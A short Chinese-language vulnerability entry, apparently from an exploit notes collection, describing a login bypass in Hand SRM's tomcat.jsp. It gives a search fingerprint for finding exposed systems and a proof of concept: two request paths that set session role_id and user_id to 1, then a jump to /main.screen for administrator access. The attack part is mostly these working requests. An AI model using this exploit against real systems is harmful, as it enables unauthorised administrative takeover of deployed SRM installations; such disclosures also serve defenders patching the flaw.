# 汉得SRM tomcat.jsp 登陆绕过漏洞

## 漏洞描述

汉得SRM tomcat.jsp 文件存在登陆绕过漏洞, 攻击者通过发送请求包，可以获取后台管理员权限

## 漏洞影响

汉得SRM

## 网络测绘

```
web.body="汉得SRM"
```

## 漏洞复现

登陆页面

![image-20230828164434474](images/image-20230828164434474.png)

验证POC (Tomcat session操控)

```
/tomcat.jsp?dataName=role_id&dataValue=1
/tomcat.jsp?dataName=user_id&dataValue=1
```

![image-20230828164451105](images/image-20230828164451105.png)

访问跳转后台

```
/main.screen
```